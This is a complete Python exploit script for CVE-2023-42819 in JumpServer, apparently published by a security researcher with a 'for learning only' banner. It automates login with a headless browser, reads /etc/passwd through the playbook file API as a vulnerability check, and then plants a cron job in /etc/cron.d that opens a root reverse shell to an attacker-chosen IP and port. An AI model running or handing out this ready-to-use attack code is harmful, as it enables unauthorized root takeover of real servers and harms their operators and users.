# -*- coding: utf-8 -*- import argparse import json import logging import os import random import string import sys import time from urllib.parse import urljoin import colorlog import httpx from selenium import webdriver from selenium.webdriver.chrome.service import Service from selenium.webdriver.common.by import By from selenium.webdriver.support.wait import WebDriverWait import undetected_chromedriver as uc # 代理设置 PROXIES = {} def banner(): print(''' ██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██╗ ██╗██████╗ █████╗ ██╗ █████╗ ██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗╚════██╗ ██║ ██║╚════██╗██╔══██╗███║██╔══██╗ ██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗███████║ █████╔╝╚█████╔╝╚██║╚██████║ ██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚═══██╗╚════╝╚════██║██╔═══╝ ██╔══██╗ ██║ ╚═══██║ ╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗██████╔╝ ██║███████╗╚█████╔╝ ██║ █████╔╝ ╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝╚═════╝ ╚═╝╚══════╝ ╚════╝ ╚═╝ ╚════╝ @Auth: C1ph3rX13 @Blog: https://c1ph3rx13.github.io @Note: 代码仅供学习使用,请勿用于其他用途 ''') def setup_color_logging(): # 创建一个 colorlog 的日志记录器 logger_setting = colorlog.getLogger() logger_setting.setLevel(logging.INFO) # 创建控制台处理器并设置格式 console_handler = logging.StreamHandler(sys.stdout) console_formatter = colorlog.ColoredFormatter( '%(asctime)s - %(log_color)s%(levelname)s - %(message)s', datefmt='%Y-%m-%d %H:%M:%S', reset=True, log_colors={ 'DEBUG': 'cyan', 'INFO': 'green', 'WARNING': 'yellow', 'ERROR': 'red', 'CRITICAL': 'bold_red', } ) console_handler.setFormatter(console_formatter) # 将处理器添加到日志记录器 logger_setting.addHandler(console_handler) return logger_setting # 日志记录器对象 logger = setup_color_logging() def create_driver(): # 设置 chromedriver 的路径,使用新版的 Service # selenium version > 4.9 service = Service(executable_path='chromedriver.exe') # 设置 ChromeOptions options = uc.ChromeOptions() options.add_argument('--disable-gpu') options.add_argument('--no-sandbox') options.add_argument('--headless') options.add_argument( '--user-agent=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36') options.add_argument('--ignore-certificate-errors') options.add_argument("--disable-logging") options.add_argument("--disable-dev-shm-usage") options.add_argument("--disable-plugins-discovery") options.add_argument('--no-first-run') options.add_argument('--no-service-autorun') options.add_argument('--no-default-browser-check') if PROXIES: options.add_argument(f"--proxy-server={PROXIES['all://']}") # 创建浏览器对象 driver = uc.Chrome(service=service, options=options) # driver = webdriver.Chrome(service=service, options=options) return driver def do_login(target: str, username: str, password: str): # 获取浏览器对象 browser = create_driver() # 打开登录页面 url = urljoin(target, '/core/auth/login/') browser.get(url=url) time.sleep(2) # 定位用户名和密码输入框 username_input = browser.find_element(by=By.NAME, value='username') password_input = browser.find_element(by=By.ID, value='password') btn = browser.find_element(by=By.XPATH, value='//*[@id="login-form"]/div[5]/button') # 显示等待 wait = WebDriverWait(browser, timeout=3) wait.until(lambda username_wait: username_input.is_displayed()) wait.until(lambda password_wait: password_input.is_displayed()) wait.until(lambda btn_wait: btn.is_displayed()) # 清空输入框 username_input.clear() password_input.clear() # 输入用户名和密码 username_input.send_keys(username) password_input.send_keys(password) # 点击提交 btn.click() # 获取当前页面的所有 cookie 信息 (返回字典) cookies = browser.get_cookies() logger.critical('Getting Cookies') # 将字典形式的 cookies 转换成 JSON 格式的字符串 json_cookies = json.dumps(cookies) # 生成 cookie 文件名 cookie_name = f'cookies.json' # 将 JSON 格式的 cookies 写入到本地文件 with open(cookie_name, "w") as f: f.write(json_cookies) logger.critical('Cookies Write') # 等待保存 cookie time.sleep(3) # 关闭浏览器 browser.close() def generate_random_letters(length): letters = string.ascii_letters # 获取所有大小写字母 random_letters = ''.join(random.choices(letters, k=length)) # 从字母中随机选择指定长度的字符并拼接起来 return random_letters def client_config(): # 读取 cookie.json with open('cookies.json', "r") as f: json_cookies = f.read() # 将 JSON 格式的 cookies 转换成字典形式 cookies = json.loads(json_cookies) # 将 Cookie 列表转换为字典 cookies_dict = {cookie['name']: cookie['value'] for cookie in cookies} # 设置 headers 的 X-CSRFToken 参数 headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36', } # 获取 cookies 中的 jms_csrftoken CSRFToken = cookies_dict['jms_csrftoken'] # 设置 headers 的 X-CSRFToken,必须带上 X-CSRFToken 参数 headers.update({'X-CSRFToken': CSRFToken}) client = httpx.Client(headers=headers, verify=False, follow_redirects=False, cookies=cookies_dict, proxies=PROXIES) return client def uid_verify(target: str, client): # 如果存在 PlayBook 对象的情况下 # Set API Url uid_url = urljoin(target, '/api/v1/ops/playbooks/') # Get uid try: uid_resp = client.get(url=uid_url) # 获取 uid if uid_resp.status_code == httpx.codes.OK and 'id' in uid_resp.text: uid_data = json.loads(uid_resp.text) ids = [entry['id'] for entry in uid_data] logger.critical('Playbook API INFO: %s', uid_resp.text) logger.critical('Playbook UID: %s', ids) return ids[0] else: logger.critical('Playbook UID is not exists') except (httpx.RequestError, httpx.HTTPStatusError) as error: logger.error('Request error or HTTP status error: %s', error) def add_playbook(target: str, client): playbook_url = urljoin(target, '/api/v1/ops/playbooks/') # 随机命名 playbook_name = generate_random_letters(4) json_data = { 'name': playbook_name, } try: add_resp = client.post(url=playbook_url, json=json_data) if add_resp.status_code == 201 and 'id' in add_resp.text: logger.critical('Successfully Added: %s', add_resp.text) elif add_resp.status_code == 400: logger.error('Fields must be Unique: %s', add_resp.text) else: logger.error('Unknown Error: %s', add_resp.headers, add_resp.text) except (httpx.RequestError, httpx.HTTPStatusError) as error: logger.error('Request error or HTTP status error: %s', error) def poc(target: str, uid: str, client): poc_url = urljoin(target, '/api/v1/ops/playbook/' + uid + '/file/?key=/etc/passwd') try: poc_resp = client.get(url=poc_url) if 'root' in poc_resp.text: logger.critical('Vulnerable : %s ', poc_resp.url) logger.critical('Output: %s', poc_resp.text) return True else: logger.critical('Not Vulnerable') return False except (httpx.RequestError, httpx.HTTPStatusError) as error: logger.error('Request error or HTTP status error: %s', error) def exp(target: str, uid: str, client, shell_ip: str, shell_port: str): # 创建计划任务 exp_url = urljoin(target, '/api/v1/ops/playbook/' + uid + '/file/') # JSON json_data = { "key": "/etc/cron.d", # 创建路径 "is_directory": True, # 创建文件夹 "name": "/etc/cron.d", # 指定创建文件夹的名称 } # 随机计划任务文件名 shell_name = generate_random_letters(4) # JSON shell_data = { "key": "/etc/cron.d", # 创建文件的路径 "is_directory": False, # 不创建文件夹 "name": shell_name, # 创建文件的名称 "content": f"* * * * * root bash -c \"bash -i >& /dev/tcp/{shell_ip}/{shell_port} 0>&1\"\n" # 创建文件的内容 } try: # 创建 cron.d 目录 exp_resp = client.post(url=exp_url, json=json_data) if exp_resp.status_code == httpx.codes.OK: logger.critical('Directory is Successfully Created: %s', exp_resp.text) # 创建反弹 Shell 计划任务 shell_resp = client.post(url=exp_url, json=shell_data) if shell_resp.status_code == httpx.codes.OK: logger.critical('Reverse Shell is Successfully Set: %s', shell_resp.text) else: logger.critical('Reverse Shell Failed: %s', exp_resp.text) else: logger.critical('Directory Creation Failed: %s', exp_resp.text) except (httpx.RequestError, httpx.HTTPStatusError) as error: logger.error('Request error or HTTP status error: %s', error) def check_and_exploit(target: str, uid: str, client, shell_ip: str, shell_port: str): if poc(target, uid, client): exp(target, uid, client, shell_ip, shell_port) def run(target: str, username: str, password: str, shell_ip: str, shell_port: str): # 判断 cookie 文件是否存在 if not os.path.exists('cookies.json'): # 登录并获取 cookies 和 headers logger.warning('Cookie is not exists, DO LOGIN') do_login(target, username, password) # 获取 client client = client_config() # 如果存在 uid uid = uid_verify(target, client) if uid: check_and_exploit(target, uid, client, shell_ip, shell_port) else: # 如果不存在 uid,则执行添加动作 add_playbook(target, client) uid = uid_verify(target, client) check_and_exploit(target, uid, client, shell_ip, shell_port) if __name__ == '__main__': banner() parser = argparse.ArgumentParser(description='CVE-2023-42819 by C1ph3rX13.') parser.add_argument('-t', '--target', type=str, required=True, help='target url') parser.add_argument('-u', '--username', type=str, required=True, help='account username') parser.add_argument('-p', '--password', type=str, required=True, help='account password') parser.add_argument('--ip', type=str, required=True, help='shell ip') parser.add_argument('--port', type=str, required=True, help='shell port') parser.add_argument("--proxy", type=str, required=False, help="proxy to http://ip:port") args = parser.parse_args() if args.proxy: PROXIES = {'all://': f'{args.proxy}'} run(args.target, args.username, args.password, args.ip, args.port)